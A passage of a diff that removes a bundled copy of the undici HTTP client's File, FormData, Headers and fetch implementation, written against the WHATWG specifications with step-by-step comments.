webidl.dictionaryConverter([ - { - key: 'lastModified', - converter: webidl.converters['long long'], - get defaultValue () { - return Date.now() - } - }, - { - key: 'type', - converter: webidl.converters.DOMString, - defaultValue: '' - }, - { - key: 'endings', - converter: (value) => { - value = webidl.converters.DOMString(value) - value = value.toLowerCase() - - if (value !== 'native') { - value = 'transparent' - } - - return value - }, - defaultValue: 'transparent' - } -]) - -/** - * @see https://www.w3.org/TR/FileAPI/#process-blob-parts - * @param {(NodeJS.TypedArray|Blob|string)[]} parts - * @param {{ type: string, endings: string }} options - */ -function processBlobParts (parts, options) { - // 1. Let bytes be an empty sequence of bytes. - /** @type {NodeJS.TypedArray[]} */ - const bytes = [] - - // 2. For each element in parts: - for (const element of parts) { - // 1. If element is a USVString, run the following substeps: - if (typeof element === 'string') { - // 1. Let s be element. - let s = element - - // 2. If the endings member of options is "native", set s - // to the result of converting line endings to native - // of element. - if (options.endings === 'native') { - s = convertLineEndingsNative(s) - } - - // 3. Append the result of UTF-8 encoding s to bytes. - bytes.push(encoder.encode(s)) - } else if ( - types.isAnyArrayBuffer(element) || - types.isTypedArray(element) - ) { - // 2. If element is a BufferSource, get a copy of the - // bytes held by the buffer source, and append those - // bytes to bytes. - if (!element.buffer) { // ArrayBuffer - bytes.push(new Uint8Array(element)) - } else { - bytes.push( - new Uint8Array(element.buffer, element.byteOffset, element.byteLength) - ) - } - } else if (isBlobLike(element)) { - // 3. If element is a Blob, append the bytes it represents - // to bytes. - bytes.push(element) - } - } - - // 3. Return bytes. - return bytes -} - -/** - * @see https://www.w3.org/TR/FileAPI/#convert-line-endings-to-native - * @param {string} s - */ -function convertLineEndingsNative (s) { - // 1. Let native line ending be be the code point U+000A LF. - let nativeLineEnding = '\n' - - // 2. If the underlying platform’s conventions are to - // represent newlines as a carriage return and line feed - // sequence, set native line ending to the code point - // U+000D CR followed by the code point U+000A LF. - if (process.platform === 'win32') { - nativeLineEnding = '\r\n' - } - - return s.replace(/\r?\n/g, nativeLineEnding) -} - -// If this function is moved to ./util.js, some tools (such as -// rollup) will warn about circular dependencies. See: -// https://github.com/nodejs/undici/issues/1629 -function isFileLike (object) { - return ( - (NativeFile && object instanceof NativeFile) || - object instanceof File || ( - object && - (typeof object.stream === 'function' || - typeof object.arrayBuffer === 'function') && - object[Symbol.toStringTag] === 'File' - ) - ) -} - -module.exports = { File, FileLike, isFileLike } - - -/***/ }), - -/***/ 2015: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { isBlobLike, toUSVString, makeIterator } = __nccwpck_require__(2538) -const { kState } = __nccwpck_require__(5861) -const { File: UndiciFile, FileLike, isFileLike } = __nccwpck_require__(8511) -const { webidl } = __nccwpck_require__(1744) -const { Blob, File: NativeFile } = __nccwpck_require__(4300) - -/** @type {globalThis['File']} */ -const File = NativeFile ?? UndiciFile - -// https://xhr.spec.whatwg.org/#formdata -class FormData { - constructor (form) { - if (form !== undefined) { - throw webidl.errors.conversionFailed({ - prefix: 'FormData constructor', - argument: 'Argument 1', - types: ['undefined'] - }) - } - - this[kState] = [] - } - - append (name, value, filename = undefined) { - webidl.brandCheck(this, FormData) - - webidl.argumentLengthCheck(arguments, 2, { header: 'FormData.append' }) - - if (arguments.length === 3 && !isBlobLike(value)) { - throw new TypeError( - "Failed to execute 'append' on 'FormData': parameter 2 is not of type 'Blob'" - ) - } - - // 1. Let value be value if given; otherwise blobValue. - - name = webidl.converters.USVString(name) - value = isBlobLike(value) - ? webidl.converters.Blob(value, { strict: false }) - : webidl.converters.USVString(value) - filename = arguments.length === 3 - ? webidl.converters.USVString(filename) - : undefined - - // 2. Let entry be the result of creating an entry with - // name, value, and filename if given. - const entry = makeEntry(name, value, filename) - - // 3. Append entry to this’s entry list. - this[kState].push(entry) - } - - delete (name) { - webidl.brandCheck(this, FormData) - - webidl.argumentLengthCheck(arguments, 1, { header: 'FormData.delete' }) - - name = webidl.converters.USVString(name) - - // The delete(name) method steps are to remove all entries whose name - // is name from this’s entry list. - this[kState] = this[kState].filter(entry => entry.name !== name) - } - - get (name) { - webidl.brandCheck(this, FormData) - - webidl.argumentLengthCheck(arguments, 1, { header: 'FormData.get' }) - - name = webidl.converters.USVString(name) - - // 1. If there is no entry whose name is name in this’s entry list, - // then return null. - const idx = this[kState].findIndex((entry) => entry.name === name) - if (idx === -1) { - return null - } - - // 2. Return the value of the first entry whose name is name from - // this’s entry list. - return this[kState][idx].value - } - - getAll (name) { - webidl.brandCheck(this, FormData) - - webidl.argumentLengthCheck(arguments, 1, { header: 'FormData.getAll' }) - - name = webidl.converters.USVString(name) - - // 1. If there is no entry whose name is name in this’s entry list, - // then return the empty list. - // 2. Return the values of all entries whose name is name, in order, - // from this’s entry list. - return this[kState] - .filter((entry) => entry.name === name) - .map((entry) => entry.value) - } - - has (name) { - webidl.brandCheck(this, FormData) - - webidl.argumentLengthCheck(arguments, 1, { header: 'FormData.has' }) - - name = webidl.converters.USVString(name) - - // The has(name) method steps are to return true if there is an entry - // whose name is name in this’s entry list; otherwise false. - return this[kState].findIndex((entry) => entry.name === name) !== -1 - } - - set (name, value, filename = undefined) { - webidl.brandCheck(this, FormData) - - webidl.argumentLengthCheck(arguments, 2, { header: 'FormData.set' }) - - if (arguments.length === 3 && !isBlobLike(value)) { - throw new TypeError( - "Failed to execute 'set' on 'FormData': parameter 2 is not of type 'Blob'" - ) - } - - // The set(name, value) and set(name, blobValue, filename) method steps - // are: - - // 1. Let value be value if given; otherwise blobValue. - - name = webidl.converters.USVString(name) - value = isBlobLike(value) - ? webidl.converters.Blob(value, { strict: false }) - : webidl.converters.USVString(value) - filename = arguments.length === 3 - ? toUSVString(filename) - : undefined - - // 2. Let entry be the result of creating an entry with name, value, and - // filename if given. - const entry = makeEntry(name, value, filename) - - // 3. If there are entries in this’s entry list whose name is name, then - // replace the first such entry with entry and remove the others. - const idx = this[kState].findIndex((entry) => entry.name === name) - if (idx !== -1) { - this[kState] = [ - ...this[kState].slice(0, idx), - entry, - ...this[kState].slice(idx + 1).filter((entry) => entry.name !== name) - ] - } else { - // 4. Otherwise, append entry to this’s entry list. - this[kState].push(entry) - } - } - - entries () { - webidl.brandCheck(this, FormData) - - return makeIterator( - () => this[kState].map(pair => [pair.name, pair.value]), - 'FormData', - 'key+value' - ) - } - - keys () { - webidl.brandCheck(this, FormData) - - return makeIterator( - () => this[kState].map(pair => [pair.name, pair.value]), - 'FormData', - 'key' - ) - } - - values () { - webidl.brandCheck(this, FormData) - - return makeIterator( - () => this[kState].map(pair => [pair.name, pair.value]), - 'FormData', - 'value' - ) - } - - /** - * @param {(value: string, key: string, self: FormData) => void} callbackFn - * @param {unknown} thisArg - */ - forEach (callbackFn, thisArg = globalThis) { - webidl.brandCheck(this, FormData) - - webidl.argumentLengthCheck(arguments, 1, { header: 'FormData.forEach' }) - - if (typeof callbackFn !== 'function') { - throw new TypeError( - "Failed to execute 'forEach' on 'FormData': parameter 1 is not of type 'Function'." - ) - } - - for (const [key, value] of this) { - callbackFn.apply(thisArg, [value, key, this]) - } - } -} - -FormData.prototype[Symbol.iterator] = FormData.prototype.entries - -Object.defineProperties(FormData.prototype, { - [Symbol.toStringTag]: { - value: 'FormData', - configurable: true - } -}) - -/** - * @see https://html.spec.whatwg.org/multipage/form-control-infrastructure.html#create-an-entry - * @param {string} name - * @param {string|Blob} value - * @param {?string} filename - * @returns - */ -function makeEntry (name, value, filename) { - // 1. Set name to the result of converting name into a scalar value string. - // "To convert a string into a scalar value string, replace any surrogates - // with U+FFFD." - // see: https://nodejs.org/dist/latest-v18.x/docs/api/buffer.html#buftostringencoding-start-end - name = Buffer.from(name).toString('utf8') - - // 2. If value is a string, then set value to the result of converting - // value into a scalar value string. - if (typeof value === 'string') { - value = Buffer.from(value).toString('utf8') - } else { - // 3. Otherwise: - - // 1. If value is not a File object, then set value to a new File object, - // representing the same bytes, whose name attribute value is "blob" - if (!isFileLike(value)) { - value = value instanceof Blob - ? new File([value], 'blob', { type: value.type }) - : new FileLike(value, 'blob', { type: value.type }) - } - - // 2. If filename is given, then set value to a new File object, - // representing the same bytes, whose name attribute is filename. - if (filename !== undefined) { - /** @type {FilePropertyBag} */ - const options = { - type: value.type, - lastModified: value.lastModified - } - - value = (NativeFile && value instanceof NativeFile) || value instanceof UndiciFile - ? new File([value], filename, options) - : new FileLike(value, filename, options) - } - } - - // 4. Return an entry whose name is name and whose value is value. - return { name, value } -} - -module.exports = { FormData } - - -/***/ }), - -/***/ 1246: -/***/ ((module) => { - -"use strict"; - - -// In case of breaking changes, increase the version -// number to avoid conflicts. -const globalOrigin = Symbol.for('undici.globalOrigin.1') - -function getGlobalOrigin () { - return globalThis[globalOrigin] -} - -function setGlobalOrigin (newOrigin) { - if (newOrigin === undefined) { - Object.defineProperty(globalThis, globalOrigin, { - value: undefined, - writable: true, - enumerable: false, - configurable: false - }) - - return - } - - const parsedURL = new URL(newOrigin) - - if (parsedURL.protocol !== 'http:' && parsedURL.protocol !== 'https:') { - throw new TypeError(`Only http & https urls are allowed, received ${parsedURL.protocol}`) - } - - Object.defineProperty(globalThis, globalOrigin, { - value: parsedURL, - writable: true, - enumerable: false, - configurable: false - }) -} - -module.exports = { - getGlobalOrigin, - setGlobalOrigin -} - - -/***/ }), - -/***/ 554: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; -// https://github.com/Ethan-Arrowood/undici-fetch - - - -const { kHeadersList, kConstruct } = __nccwpck_require__(2785) -const { kGuard } = __nccwpck_require__(5861) -const { kEnumerableProperty } = __nccwpck_require__(3983) -const { - makeIterator, - isValidHeaderName, - isValidHeaderValue -} = __nccwpck_require__(2538) -const { webidl } = __nccwpck_require__(1744) -const assert = __nccwpck_require__(9491) - -const kHeadersMap = Symbol('headers map') -const kHeadersSortedMap = Symbol('headers map sorted') - -/** - * @param {number} code - */ -function isHTTPWhiteSpaceCharCode (code) { - return code === 0x00a || code === 0x00d || code === 0x009 || code === 0x020 -} - -/** - * @see https://fetch.spec.whatwg.org/#concept-header-value-normalize - * @param {string} potentialValue - */ -function headerValueNormalize (potentialValue) { - // To normalize a byte sequence potentialValue, remove - // any leading and trailing HTTP whitespace bytes from - // potentialValue. - let i = 0; let j = potentialValue.length - - while (j > i && isHTTPWhiteSpaceCharCode(potentialValue.charCodeAt(j - 1))) --j - while (j > i && isHTTPWhiteSpaceCharCode(potentialValue.charCodeAt(i))) ++i - - return i === 0 && j === potentialValue.length ? potentialValue : potentialValue.substring(i, j) -} - -function fill (headers, object) { - // To fill a Headers object headers with a given object object, run these steps: - - // 1. If object is a sequence, then for each header in object: - // Note: webidl conversion to array has already been done. - if (Array.isArray(object)) { - for (let i = 0; i < object.length; ++i) { - const header = object[i] - // 1. If header does not contain exactly two items, then throw a TypeError. - if (header.length !== 2) { - throw webidl.errors.exception({ - header: 'Headers constructor', - message: `expected name/value pair to be length 2, found ${header.length}.` - }) - } - - // 2. Append (header’s first item, header’s second item) to headers. - appendHeader(headers, header[0], header[1]) - } - } else if (typeof object === 'object' && object !== null) { - // Note: null should throw - - // 2. Otherwise, object is a record, then for each key → value in object, - // append (key, value) to headers - const keys = Object.keys(object) - for (let i = 0; i < keys.length; ++i) { - appendHeader(headers, keys[i], object[keys[i]]) - } - } else { - throw webidl.errors.conversionFailed({ - prefix: 'Headers constructor', - argument: 'Argument 1', - types: ['sequence>', 'record'] - }) - } -} - -/** - * @see https://fetch.spec.whatwg.org/#concept-headers-append - */ -function appendHeader (headers, name, value) { - // 1. Normalize value. - value = headerValueNormalize(value) - - // 2. If name is not a header name or value is not a - // header value, then throw a TypeError. - if (!isValidHeaderName(name)) { - throw webidl.errors.invalidArgument({ - prefix: 'Headers.append', - value: name, - type: 'header name' - }) - } else if (!isValidHeaderValue(value)) { - throw webidl.errors.invalidArgument({ - prefix: 'Headers.append', - value, - type: 'header value' - }) - } - - // 3. If headers’s guard is "immutable", then throw a TypeError. - // 4. Otherwise, if headers’s guard is "request" and name is a - // forbidden header name, return. - // Note: undici does not implement forbidden header names - if (headers[kGuard] === 'immutable') { - throw new TypeError('immutable') - } else if (headers[kGuard] === 'request-no-cors') { - // 5. Otherwise, if headers’s guard is "request-no-cors": - // TODO - } - - // 6. Otherwise, if headers’s guard is "response" and name is a - // forbidden response-header name, return. - - // 7. Append (name, value) to headers’s header list. - return headers[kHeadersList].append(name, value) - - // 8. If headers’s guard is "request-no-cors", then remove - // privileged no-CORS request headers from headers -} - -class HeadersList { - /** @type {[string, string][]|null} */ - cookies = null - - constructor (init) { - if (init instanceof HeadersList) { - this[kHeadersMap] = new Map(init[kHeadersMap]) - this[kHeadersSortedMap] = init[kHeadersSortedMap] - this.cookies = init.cookies === null ? null : [...init.cookies] - } else { - this[kHeadersMap] = new Map(init) - this[kHeadersSortedMap] = null - } - } - - // https://fetch.spec.whatwg.org/#header-list-contains - contains (name) { - // A header list list contains a header name name if list - // contains a header whose name is a byte-case-insensitive - // match for name. - name = name.toLowerCase() - - return this[kHeadersMap].has(name) - } - - clear () { - this[kHeadersMap].clear() - this[kHeadersSortedMap] = null - this.cookies = null - } - - // https://fetch.spec.whatwg.org/#concept-header-list-append - append (name, value) { - this[kHeadersSortedMap] = null - - // 1. If list contains name, then set name to the first such - // header’s name. - const lowercaseName = name.toLowerCase() - const exists = this[kHeadersMap].get(lowercaseName) - - // 2. Append (name, value) to list. - if (exists) { - const delimiter = lowercaseName === 'cookie' ? '; ' : ', ' - this[kHeadersMap].set(lowercaseName, { - name: exists.name, - value: `${exists.value}${delimiter}${value}` - }) - } else { - this[kHeadersMap].set(lowercaseName, { name, value }) - } - - if (lowercaseName === 'set-cookie') { - this.cookies ??= [] - this.cookies.push(value) - } - } - - // https://fetch.spec.whatwg.org/#concept-header-list-set - set (name, value) { - this[kHeadersSortedMap] = null - const lowercaseName = name.toLowerCase() - - if (lowercaseName === 'set-cookie') { - this.cookies = [value] - } - - // 1. If list contains name, then set the value of - // the first such header to value and remove the - // others. - // 2. Otherwise, append header (name, value) to list. - this[kHeadersMap].set(lowercaseName, { name, value }) - } - - // https://fetch.spec.whatwg.org/#concept-header-list-delete - delete (name) { - this[kHeadersSortedMap] = null - - name = name.toLowerCase() - - if (name === 'set-cookie') { - this.cookies = null - } - - this[kHeadersMap].delete(name) - } - - // https://fetch.spec.whatwg.org/#concept-header-list-get - get (name) { - const value = this[kHeadersMap].get(name.toLowerCase()) - - // 1. If list does not contain name, then return null. - // 2. Return the values of all headers in list whose name - // is a byte-case-insensitive match for name, - // separated from each other by 0x2C 0x20, in order. - return value === undefined ? null : value.value - } - - * [Symbol.iterator] () { - // use the lowercased name - for (const [name, { value }] of this[kHeadersMap]) { - yield [name, value] - } - } - - get entries () { - const headers = {} - - if (this[kHeadersMap].size) { - for (const { name, value } of this[kHeadersMap].values()) { - headers[name] = value - } - } - - return headers - } -} - -// https://fetch.spec.whatwg.org/#headers-class -class Headers { - constructor (init = undefined) { - if (init === kConstruct) { - return - } - this[kHeadersList] = new HeadersList() - - // The new Headers(init) constructor steps are: - - // 1. Set this’s guard to "none". - this[kGuard] = 'none' - - // 2. If init is given, then fill this with init. - if (init !== undefined) { - init = webidl.converters.HeadersInit(init) - fill(this, init) - } - } - - // https://fetch.spec.whatwg.org/#dom-headers-append - append (name, value) { - webidl.brandCheck(this, Headers) - - webidl.argumentLengthCheck(arguments, 2, { header: 'Headers.append' }) - - name = webidl.converters.ByteString(name) - value = webidl.converters.ByteString(value) - - return appendHeader(this, name, value) - } - - // https://fetch.spec.whatwg.org/#dom-headers-delete - delete (name) { - webidl.brandCheck(this, Headers) - - webidl.argumentLengthCheck(arguments, 1, { header: 'Headers.delete' }) - - name = webidl.converters.ByteString(name) - - // 1. If name is not a header name, then throw a TypeError. - if (!isValidHeaderName(name)) { - throw webidl.errors.invalidArgument({ - prefix: 'Headers.delete', - value: name, - type: 'header name' - }) - } - - // 2. If this’s guard is "immutable", then throw a TypeError. - // 3. Otherwise, if this’s guard is "request" and name is a - // forbidden header name, return. - // 4. Otherwise, if this’s guard is "request-no-cors", name - // is not a no-CORS-safelisted request-header name, and - // name is not a privileged no-CORS request-header name, - // return. - // 5. Otherwise, if this’s guard is "response" and name is - // a forbidden response-header name, return. - // Note: undici does not implement forbidden header names - if (this[kGuard] === 'immutable') { - throw new TypeError('immutable') - } else if (this[kGuard] === 'request-no-cors') { - // TODO - } - - // 6. If this’s header list does not contain name, then - // return. - if (!this[kHeadersList].contains(name)) { - return - } - - // 7. Delete name from this’s header list. - // 8. If this’s guard is "request-no-cors", then remove - // privileged no-CORS request headers from this. - this[kHeadersList].delete(name) - } - - // https://fetch.spec.whatwg.org/#dom-headers-get - get (name) { - webidl.brandCheck(this, Headers) - - webidl.argumentLengthCheck(arguments, 1, { header: 'Headers.get' }) - - name = webidl.converters.ByteString(name) - - // 1. If name is not a header name, then throw a TypeError. - if (!isValidHeaderName(name)) { - throw webidl.errors.invalidArgument({ - prefix: 'Headers.get', - value: name, - type: 'header name' - }) - } - - // 2. Return the result of getting name from this’s header - // list. - return this[kHeadersList].get(name) - } - - // https://fetch.spec.whatwg.org/#dom-headers-has - has (name) { - webidl.brandCheck(this, Headers) - - webidl.argumentLengthCheck(arguments, 1, { header: 'Headers.has' }) - - name = webidl.converters.ByteString(name) - - // 1. If name is not a header name, then throw a TypeError. - if (!isValidHeaderName(name)) { - throw webidl.errors.invalidArgument({ - prefix: 'Headers.has', - value: name, - type: 'header name' - }) - } - - // 2. Return true if this’s header list contains name; - // otherwise false. - return this[kHeadersList].contains(name) - } - - // https://fetch.spec.whatwg.org/#dom-headers-set - set (name, value) { - webidl.brandCheck(this, Headers) - - webidl.argumentLengthCheck(arguments, 2, { header: 'Headers.set' }) - - name = webidl.converters.ByteString(name) - value = webidl.converters.ByteString(value) - - // 1. Normalize value. - value = headerValueNormalize(value) - - // 2. If name is not a header name or value is not a - // header value, then throw a TypeError. - if (!isValidHeaderName(name)) { - throw webidl.errors.invalidArgument({ - prefix: 'Headers.set', - value: name, - type: 'header name' - }) - } else if (!isValidHeaderValue(value)) { - throw webidl.errors.invalidArgument({ - prefix: 'Headers.set', - value, - type: 'header value' - }) - } - - // 3. If this’s guard is "immutable", then throw a TypeError. - // 4. Otherwise, if this’s guard is "request" and name is a - // forbidden header name, return. - // 5. Otherwise, if this’s guard is "request-no-cors" and - // name/value is not a no-CORS-safelisted request-header, - // return. - // 6. Otherwise, if this’s guard is "response" and name is a - // forbidden response-header name, return. - // Note: undici does not implement forbidden header names - if (this[kGuard] === 'immutable') { - throw new TypeError('immutable') - } else if (this[kGuard] === 'request-no-cors') { - // TODO - } - - // 7. Set (name, value) in this’s header list. - // 8. If this’s guard is "request-no-cors", then remove - // privileged no-CORS request headers from this - this[kHeadersList].set(name, value) - } - - // https://fetch.spec.whatwg.org/#dom-headers-getsetcookie - getSetCookie () { - webidl.brandCheck(this, Headers) - - // 1. If this’s header list does not contain `Set-Cookie`, then return « ». - // 2. Return the values of all headers in this’s header list whose name is - // a byte-case-insensitive match for `Set-Cookie`, in order. - - const list = this[kHeadersList].cookies - - if (list) { - return [...list] - } - - return [] - } - - // https://fetch.spec.whatwg.org/#concept-header-list-sort-and-combine - get [kHeadersSortedMap] () { - if (this[kHeadersList][kHeadersSortedMap]) { - return this[kHeadersList][kHeadersSortedMap] - } - - // 1. Let headers be an empty list of headers with the key being the name - // and value the value. - const headers = [] - - // 2. Let names be the result of convert header names to a sorted-lowercase - // set with all the names of the headers in list. - const names = [...this[kHeadersList]].sort((a, b) => a[0] < b[0] ? -1 : 1) - const cookies = this[kHeadersList].cookies - - // 3. For each name of names: - for (let i = 0; i < names.length; ++i) { - const [name, value] = names[i] - // 1. If name is `set-cookie`, then: - if (name === 'set-cookie') { - // 1. Let values be a list of all values of headers in list whose name - // is a byte-case-insensitive match for name, in order. - - // 2. For each value of values: - // 1. Append (name, value) to headers. - for (let j = 0; j < cookies.length; ++j) { - headers.push([name, cookies[j]]) - } - } else { - // 2. Otherwise: - - // 1. Let value be the result of getting name from list. - - // 2. Assert: value is non-null. - assert(value !== null) - - // 3. Append (name, value) to headers. - headers.push([name, value]) - } - } - - this[kHeadersList][kHeadersSortedMap] = headers - - // 4. Return headers. - return headers - } - - keys () { - webidl.brandCheck(this, Headers) - - if (this[kGuard] === 'immutable') { - const value = this[kHeadersSortedMap] - return makeIterator(() => value, 'Headers', - 'key') - } - - return makeIterator( - () => [...this[kHeadersSortedMap].values()], - 'Headers', - 'key' - ) - } - - values () { - webidl.brandCheck(this, Headers) - - if (this[kGuard] === 'immutable') { - const value = this[kHeadersSortedMap] - return makeIterator(() => value, 'Headers', - 'value') - } - - return makeIterator( - () => [...this[kHeadersSortedMap].values()], - 'Headers', - 'value' - ) - } - - entries () { - webidl.brandCheck(this, Headers) - - if (this[kGuard] === 'immutable') { - const value = this[kHeadersSortedMap] - return makeIterator(() => value, 'Headers', - 'key+value') - } - - return makeIterator( - () => [...this[kHeadersSortedMap].values()], - 'Headers', - 'key+value' - ) - } - - /** - * @param {(value: string, key: string, self: Headers) => void} callbackFn - * @param {unknown} thisArg - */ - forEach (callbackFn, thisArg = globalThis) { - webidl.brandCheck(this, Headers) - - webidl.argumentLengthCheck(arguments, 1, { header: 'Headers.forEach' }) - - if (typeof callbackFn !== 'function') { - throw new TypeError( - "Failed to execute 'forEach' on 'Headers': parameter 1 is not of type 'Function'." - ) - } - - for (const [key, value] of this) { - callbackFn.apply(thisArg, [value, key, this]) - } - } - - [Symbol.for('nodejs.util.inspect.custom')] () { - webidl.brandCheck(this, Headers) - - return this[kHeadersList] - } -} - -Headers.prototype[Symbol.iterator] = Headers.prototype.entries - -Object.defineProperties(Headers.prototype, { - append: kEnumerableProperty, - delete: kEnumerableProperty, - get: kEnumerableProperty, - has: kEnumerableProperty, - set: kEnumerableProperty, - getSetCookie: kEnumerableProperty, - keys: kEnumerableProperty, - values: kEnumerableProperty, - entries: kEnumerableProperty, - forEach: kEnumerableProperty, - [Symbol.iterator]: { enumerable: false }, - [Symbol.toStringTag]: { - value: 'Headers', - configurable: true - } -}) - -webidl.converters.HeadersInit = function (V) { - if (webidl.util.Type(V) === 'Object') { - if (V[Symbol.iterator]) { - return webidl.converters['sequence>'](V) - } - - return webidl.converters['record'](V) - } - - throw webidl.errors.conversionFailed({ - prefix: 'Headers constructor', - argument: 'Argument 1', - types: ['sequence>', 'record'] - }) -} - -module.exports = { - fill, - Headers, - HeadersList -} - - -/***/ }), - -/***/ 4881: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; -// https://github.com/Ethan-Arrowood/undici-fetch - - - -const { - Response, - makeNetworkError, - makeAppropriateNetworkError, - filterResponse, - makeResponse -} = __nccwpck_require__(7823) -const { Headers } = __nccwpck_require__(554) -const { Request, makeRequest } = __nccwpck_require__(8359) -const zlib = __nccwpck_require__(9796) -const { - bytesMatch, - makePolicyContainer, - clonePolicyContainer, - requestBadPort, - TAOCheck, - appendRequestOriginHeader, - responseLocationURL, - requestCurrentURL, - setRequestReferrerPolicyOnRedirect, - tryUpgradeRequestToAPotentiallyTrustworthyURL, - createOpaqueTimingInfo, - appendFetchMetadata, - corsCheck, - crossOriginResourcePolicyCheck, - determineRequestsReferrer, - coarsenedSharedCurrentTime, - createDeferredPromise, - isBlobLike, - sameOrigin, - isCancelled, - isAborted, - isErrorLike, - fullyReadBody, - readableStreamClose, - isomorphicEncode, - urlIsLocal, - urlIsHttpHttpsScheme, - urlHasHttpsScheme -} = __nccwpck_require__(2538) -const { kState, kHeaders, kGuard, kRealm } = __nccwpck_require__(5861) -const assert = __nccwpck_require__(9491) -const { safelyExtractBody } = __nccwpck_require__(1472) -const { - redirectStatusSet, - nullBodyStatus, - safeMethodsSet, - requestBodyHeader, - subresourceSet, - DOMException -} = __nccwpck_require__(1037) -const { kHeadersList } = __nccwpck_require__(2785) -const EE = __nccwpck_require__(2361) -const { Readable, pipeline } = __nccwpck_require__(2781) -const { addAbortListener, isErrored, isReadable, nodeMajor, nodeMinor } = __nccwpck_require__(3983) -const { dataURLProcessor, serializeAMimeType } = __nccwpck_require__(685) -const { TransformStream } = __nccwpck_require__(5356) -const { getGlobalDispatcher } = __nccwpck_require__(1892) -const { webidl } = __nccwpck_require__(1744) -const { STATUS_CODES } = __nccwpck_require__(3685) -const GET_OR_HEAD = ['GET', 'HEAD'] - -/** @type {import('buffer').resolveObjectURL} */ -let resolveObjectURL -let ReadableStream = globalThis.ReadableStream - -class Fetch extends EE { - constructor (dispatcher) { - super() - - this.dispatcher = dispatcher - this.connection = null - this.dump = false - this.state = 'ongoing' - // 2 terminated listeners get added per request, - // but only 1 gets removed. If there are 20 redirects, - // 21 listeners will be added. - // See https://github.com/nodejs/undici/issues/1711 - // TODO (fix): Find and fix root cause for leaked listener. - this.setMaxListeners(21) - } - - terminate (reason) { - if (this.state !== 'ongoing') { - return - } - - this.state = 'terminated' - this.connection?.destroy(reason) - this.emit('terminated', reason) - } - - // https://fetch.spec.whatwg.org/#fetch-controller-abort - abort (error) { - if (this.state !== 'ongoing') { - return - } - - // 1. Set controller’s state to "aborted". - this.state = 'aborted' - - // 2. Let fallbackError be an "AbortError" DOMException. - // 3. Set error to fallbackError if it is not given. - if (!error) { - error = new DOMException('The operation was aborted.', 'AbortError') - } - - // 4. Let serializedError be StructuredSerialize(error). - // If that threw an exception, catch it, and let - // serializedError be StructuredSerialize(fallbackError). - - // 5. Set controller’s serialized abort reason to serializedError. - this.serializedAbortReason = error - - this.connection?.destroy(error) - this.emit('terminated', error) - } -} - -// https://fetch.spec.whatwg.org/#fetch-method -function fetch (input, init = {}) { - webidl.argumentLengthCheck(arguments, 1, { header: 'globalThis.fetch' }) - - // 1. Let p be a new promise. - const p = createDeferredPromise() - - // 2. Let requestObject be the result of invoking the initial value of - // Request as constructor with input and init as arguments. If this throws - // an exception, reject p with it and return p. - let requestObject - - try { - requestObject = new Request(input, init) - } catch (e) { - p.reject(e) - return p.promise - } - - // 3. Let request be requestObject’s request. - const request = requestObject[kState] - - // 4. If requestObject’s signal’s aborted flag is set, then: - if (requestObject.signal.aborted) { - // 1. Abort the fetch() call with p, request, null, and - // requestObject’s signal’s abort reason. - abortFetch(p, request, null, requestObject.signal.reason) - - // 2. Return p. - return p.promise - } - - // 5. Let globalObject be request’s client’s global object. - const globalObject = request.client.globalObject - - // 6. If globalObject is a ServiceWorkerGlobalScope object, then set - // request’s service-workers mode to "none". - if (globalObject?.constructor?.name === 'ServiceWorkerGlobalScope') { - request.serviceWorkers = 'none' - } - - // 7. Let responseObject be null. - let responseObject = null - - // 8. Let relevantRealm be this’s relevant Realm. - const relevantRealm = null - - // 9. Let locallyAborted be false. - let locallyAborted = false - - // 10. Let controller be null. - let controller = null - - // 11. Add the following abort steps to requestObject’s signal: - addAbortListener( - requestObject.signal, - () => { - // 1. Set locallyAborted to true. - locallyAborted = true - - // 2. Assert: controller is non-null. - assert(controller != null) - - // 3. Abort controller with requestObject’s signal’s abort reason. - controller.abort(requestObject.signal.reason) - - // 4. Abort the fetch() call with p, request, responseObject, - // and requestObject’s signal’s abort reason. - abortFetch(p, request, responseObject, requestObject.signal.reason) - } - ) - - // 12. Let handleFetchDone given response response be to finalize and - // report timing with response, globalObject, and "fetch". - const handleFetchDone = (response) => - finalizeAndReportTiming(response, 'fetch') - - // 13. Set controller to the result of calling fetch given request, - // with processResponseEndOfBody set to handleFetchDone, and processResponse - // given response being these substeps: - - const processResponse = (response) => { - // 1. If locallyAborted is true, terminate these substeps. - if (locallyAborted) { - return Promise.resolve() - } - - // 2. If response’s aborted flag is set, then: - if (response.aborted) { - // 1. Let deserializedError be the result of deserialize a serialized - // abort reason given controller’s serialized abort reason and - // relevantRealm. - - // 2. Abort the fetch() call with p, request, responseObject, and - // deserializedError. - - abortFetch(p, request, responseObject, controller.serializedAbortReason) - return Promise.resolve() - } - - // 3. If response is a network error, then reject p with a TypeError - // and terminate these substeps. - if (response.type === 'error') { - p.reject( - Object.assign(new TypeError('fetch failed'), { cause: response.error }) - ) - return Promise.resolve() - } - - // 4. Set responseObject to the result of creating a Response object, - // given response, "immutable", and relevantRealm. - responseObject = new Response() - responseObject[kState] = response - responseObject[kRealm] = relevantRealm - responseObject[kHeaders][kHeadersList] = response.headersList - responseObject[kHeaders][kGuard] = 'immutable' - responseObject[kHeaders][kRealm] = relevantRealm - - // 5. Resolve p with responseObject. - p.resolve(responseObject) - } - - controller = fetching({ - request, - processResponseEndOfBody: handleFetchDone, - processResponse, - dispatcher: init.dispatcher ?? getGlobalDispatcher() // undici - }) - - // 14. Return p. - return p.promise -} - -// https://fetch.spec.whatwg.org/#finalize-and-report-timing -function finalizeAndReportTiming (response, initiatorType = 'other') { - // 1. If response is an aborted network error, then return. - if (response.type === 'error' && response.aborted) { - return - } - - // 2. If response’s URL list is null or empty, then return. - if (!response.urlList?.length) { - return - } - - // 3. Let originalURL be response’s URL list[0]. - const originalURL = response.urlList[0] - - // 4. Let timingInfo be response’s timing info. - let timingInfo = response.timingInfo - - // 5. Let cacheState be response’s cache state. - let cacheState = response.cacheState - - // 6. If originalURL’s scheme is not an HTTP(S) scheme, then return. - if (!urlIsHttpHttpsScheme(originalURL)) { - return - } - - // 7. If timingInfo is null, then return. - if (timingInfo === null) { - return - } - - // 8. If response’s timing allow passed flag is not set, then: - if (!response.timingAllowPassed) { - // 1. Set timingInfo to a the result of creating an opaque timing info for timingInfo. - timingInfo = createOpaqueTimingInfo({ - startTime: timingInfo.startTime - }) - - // 2. Set cacheState to the empty string. - cacheState = '' - } - - // 9. Set timingInfo’s end time to the coarsened shared current time - // given global’s relevant settings object’s cross-origin isolated - 